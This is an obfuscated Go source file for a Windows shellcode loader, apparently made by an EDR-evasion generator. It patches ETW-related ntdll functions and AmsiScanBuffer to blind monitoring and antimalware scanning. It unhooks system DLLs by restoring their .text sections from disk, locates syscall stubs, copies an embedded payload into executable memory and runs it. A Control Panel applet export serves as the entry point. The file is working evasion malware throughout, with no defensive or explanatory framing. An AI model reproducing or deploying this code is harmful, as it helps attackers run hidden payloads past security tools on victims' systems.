package main import "C" import ( "debug/pe" "encoding/base64" "encoding/hex" "CenNlsUsxfvcOBUu/CenNlsUsxfvcOBUu" "strconv" "fmt" "io/ioutil" "syscall" "unsafe" "golang.org/x/sys/windows" "golang.org/x/sys/windows/registry" ) const ( HcINJaCi= 0x1F0FFF ) var _ unsafe.Pointer var ( BdNpRIH uint16 iWqX uint16 PDrnkaZ int = 3 ) func kruHOp() string { Nfmpigg, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE) IaLTKjFj, _, _ := Nfmpigg.GetStringValue("CurrentVersion") LnELg, _, err := Nfmpigg.GetIntegerValue("CurrentMajorVersionNumber") if err == nil{ //sbST, _, _ := Nfmpigg.GetIntegerValue("CurrentMinorVersionNumber") IaLTKjFj = strconv.FormatUint(LnELg, 10) } defer Nfmpigg.Close() if IaLTKjFj == "10" { BdNpRIH = 0x18 iWqX = 0x50 } else if IaLTKjFj == "6.3" { BdNpRIH = 0x17 iWqX = 0x4f } else if IaLTKjFj == "6.2" { BdNpRIH = 0x16 iWqX = 0x4e } else if IaLTKjFj == "6.1" { BdNpRIH = 0x15 iWqX= 0x4d } return IaLTKjFj } func XbdxR(wiRxn string,) string { var EbVzIsJ []byte EbVzIsJ, _ = base64.StdEncoding.DecodeString(wiRxn) EdyD := 1 for i := 1; i < PDrnkaZ; i++ { EbVzIsJ, _ = base64.StdEncoding.DecodeString(string(EbVzIsJ)) EdyD += i } return string(EbVzIsJ) } const ( wFpcHxJr= 997 ) var PDvIZ error = syscall.Errno(wFpcHxJr) var mIeJq = syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc(XbdxR("VmpOS2NHUkhWbEZqYlRscVdsaE9lbFJYVm5SaU0wbzE=")) func wVvpVgcw(iOrc uintptr, IajQzZM uintptr, vhXcG *byte, sAVqLCAz uintptr, rdYCom *uintptr) (err error) { r1, _, e1 := syscall.Syscall6(mIeJq.Addr(), 5, uintptr(iOrc), uintptr(IajQzZM), uintptr(unsafe.Pointer(vhXcG)), uintptr(sAVqLCAz), uintptr(unsafe.Pointer(rdYCom)), 0) if r1 == 0 { if e1 != 0 { err = qHvx(e1) } else { err = syscall.EINVAL } } return } func qHvx(e syscall.Errno) error { switch e { case 0: return nil case wFpcHxJr: return PDvIZ } return e } var qVBvtGI = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc(XbdxR("VWxoU00xUnRPVEJoVjFwd1dUSkdNR0ZYT1hWVmJWWnVZVmhPTUZwWVNUMD0=")) var cikudbB = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc(XbdxR("VWxoU00xSllXbXhpYmxKVFdsZGtjR016VW14alp6MDk=")) var IpfiJLHB = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc(XbdxR("VWxoU00xSllXbXhpYmxKWVkyMXNNRnBWV2pGaVIzYzk=")) var XwIpYSlB = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc(XbdxR("VWxoU00xSllXbXhpYmxKWVkyMXNNRnBSUFQwPQ==")) func OhQWllC() { KaSo := uintptr(0xffffffffffffffff) bXmBDh := []uintptr{ qVBvtGI.Addr(), cikudbB.Addr(), IpfiJLHB.Addr(), XwIpYSlB.Addr()} for i, _ := range bXmBDh { gZdUOeZ, _ := hex.DecodeString("4833C0C3") var AEgC uintptr YDNz := len(gZdUOeZ) wVvpVgcw(KaSo, bXmBDh[i], &gZdUOeZ[0], uintptr(uint32(YDNz)), &AEgC) } } func YavfjhD(KaSo windows.Handle) { bXmBDh := []uintptr{ qVBvtGI.Addr(), cikudbB.Addr(), IpfiJLHB.Addr(), XwIpYSlB.Addr()} for i, _ := range bXmBDh { gZdUOeZ, _ := hex.DecodeString("4833C0C3") var AEgC uintptr YDNz := len(gZdUOeZ) wVvpVgcw(uintptr(KaSo), bXmBDh[i], &gZdUOeZ[0], uintptr(uint32(YDNz)), &AEgC) } } func OXmIBGGf() { var LyxaYZOM uint64 LyxaYZOM = 0xffffffffffffffff svfAwRYh, _ := windows.LoadLibrary(string([]byte{'a','m','s','i','.','d','l','l'})) jwlrx, _ := windows.GetProcAddress(svfAwRYh, string([]byte{'a','m','s','i','S','c','a','n','B','u','f','f','e','r'})) dsnPs, _ := hex.DecodeString("B857000780C3") var rScXOXn uintptr KVAeNc := len(dsnPs) wVvpVgcw(uintptr(LyxaYZOM), uintptr(uint(jwlrx)), &dsnPs[0], uintptr(uint32(KVAeNc)), &rScXOXn) } var procReadProcessMemory = syscall.NewLazyDLL("kernel32.dll").NewProc("ReadProcessMemory") func euLPyx() uintptr { var funcNtAllocateVirtualMemory = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l'})).NewProc("NtAllocateVirtualMemory") handle := uintptr(0xffffffffffffffff) num := 2 var add uintptr AllAddr := funcNtAllocateVirtualMemory.Addr() for i := 0; i < 20; i++ { rawr, _, _ := ReadProcessMemory(handle, AllAddr+uintptr(i), uintptr(num)) f := fmt.Sprintf("%0x", rawr) if f == "0f05" { add = AllAddr + uintptr(i) return add } } return add } func ReadProcessMemory(hProcess uintptr, lpBaseAddress uintptr, nSize uintptr) (lpBuffer []uint8, lpNumberOfBytesRead int, ok bool) { var nBytesRead int buf := make([]uint8, nSize) ret, _, _ := procReadProcessMemory.Call( uintptr(hProcess), lpBaseAddress, uintptr(unsafe.Pointer(&buf[0])), nSize, uintptr(unsafe.Pointer(&nBytesRead)), ) return buf, nBytesRead, ret != 0 } //export CPlApplet func CPlApplet() { Run() } func main() { } //export Run func Run() { OhQWllC() OXmIBGGf() IaLTKjFj := kruHOp() if IaLTKjFj == "10" { TlximKbNGeQSDNIQFgo() } OhQWllC() ncxFcgyHkrFLQIm := CenNlsUsxfvcOBUu.BWqleXvKYTISywJ() IjWBQzxfeyHwjfQz(ncxFcgyHkrFLQIm) } func IjWBQzxfeyHwjfQz(ncxFcgyHkrFLQIm []byte){ bkbGOjyMLbTUd := windows.NewLazySystemDLL("ntdll.dll") ZGkzYjncOLAxm := windows.NewLazySystemDLL("kernel32") iYjRcypzYyQG := bkbGOjyMLbTUd.NewProc("RtlCopyMemory") fRlMwRySgMYDUDmml := ZGkzYjncOLAxm.NewProc("VirtualAlloc") var LKDBfpRJHJCIDUO, RJAdEmdVuLznhsN uintptr var OSgmQIXYCOgxzYzjNb uintptr FlZDiwjwyZDXUJE := uintptr(0xffffffffffffffff) gWGSbDTWIGNuLwH := uintptr(len(ncxFcgyHkrFLQIm)) RJAdEmdVuLznhsN = 0x40 LKDBfpRJHJCIDUO = 0x3000 owLCrembyEUbVMDyvM, _, _ := fRlMwRySgMYDUDmml.Call(0, uintptr(len(ncxFcgyHkrFLQIm)), LKDBfpRJHJCIDUO, RJAdEmdVuLznhsN) iYjRcypzYyQG.Call(owLCrembyEUbVMDyvM, (uintptr)(unsafe.Pointer(&ncxFcgyHkrFLQIm[0])), uintptr(len(ncxFcgyHkrFLQIm))) CenNlsUsxfvcOBUu.LDlBNXiFvJXMkSQMUs( iWqX, FlZDiwjwyZDXUJE, (*uintptr)(unsafe.Pointer(&owLCrembyEUbVMDyvM)), &gWGSbDTWIGNuLwH, 0x20, &OSgmQIXYCOgxzYzjNb, ) syscall.Syscall(owLCrembyEUbVMDyvM, 0, 0, 0, 0) } func TlximKbNGeQSDNIQFgo() error { eMGsXdwDVdXamFeAHV := []string{string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'}), string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'}), string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'a', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l'}), string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'})} for i, _ := range eMGsXdwDVdXamFeAHV { vxsDkXZPLVKoyrvQ, nKdDgdtWkaUpaE := ioutil.ReadFile(eMGsXdwDVdXamFeAHV[i]) if nKdDgdtWkaUpaE != nil { return nKdDgdtWkaUpaE } qXRoUHxilaxawct, nKdDgdtWkaUpaE := pe.Open(eMGsXdwDVdXamFeAHV[i]) if nKdDgdtWkaUpaE != nil { return nKdDgdtWkaUpaE } kjLpYYgEskZHInp := qXRoUHxilaxawct.Section(string([]byte{'.', 't', 'e', 'x', 't'})) PxDLmVYNfKqMXKG := vxsDkXZPLVKoyrvQ[kjLpYYgEskZHInp.Offset:kjLpYYgEskZHInp.Size] IXrqvvLMZqOm, nKdDgdtWkaUpaE := windows.LoadDLL(eMGsXdwDVdXamFeAHV[i]) if nKdDgdtWkaUpaE != nil { return nKdDgdtWkaUpaE } SIQuKEetIT := IXrqvvLMZqOm.Handle hATnssohtsILdRax := uintptr(SIQuKEetIT) PmfRPlkiYOBdWp := uint(hATnssohtsILdRax) + uint(kjLpYYgEskZHInp.VirtualAddress) ZciZXzhgNEf := uintptr(len(PxDLmVYNfKqMXKG)) iaCbozkgpTN := uintptr(0xffffffffffffffff) var jKBedclVPtBWUBh uintptr QPmiWQkmvofGtmKFlD := euLPyx() mZXqpGfgbpaQBhv, _ := CenNlsUsxfvcOBUu.McfZxCFZyKyvEZn( iWqX, QPmiWQkmvofGtmKFlD, iaCbozkgpTN, (*uintptr)(unsafe.Pointer(&PmfRPlkiYOBdWp)), &ZciZXzhgNEf, 0x40, &jKBedclVPtBWUBh, ) if mZXqpGfgbpaQBhv != 0 { } for i := 0; i < len(PxDLmVYNfKqMXKG); i++ { DeCTWdhBoUqxVZZzI := uintptr(PmfRPlkiYOBdWp + uint(i)) hCTdqyBTVqmk := (*[1]byte)(unsafe.Pointer(DeCTWdhBoUqxVZZzI)) (*hCTdqyBTVqmk)[0] = PxDLmVYNfKqMXKG[i] } mZXqpGfgbpaQBhv, _ = CenNlsUsxfvcOBUu.McfZxCFZyKyvEZn( iWqX, QPmiWQkmvofGtmKFlD, iaCbozkgpTN, (*uintptr)(unsafe.Pointer(&PmfRPlkiYOBdWp)), &ZciZXzhgNEf, 0x20, &jKBedclVPtBWUBh, ) } return nil }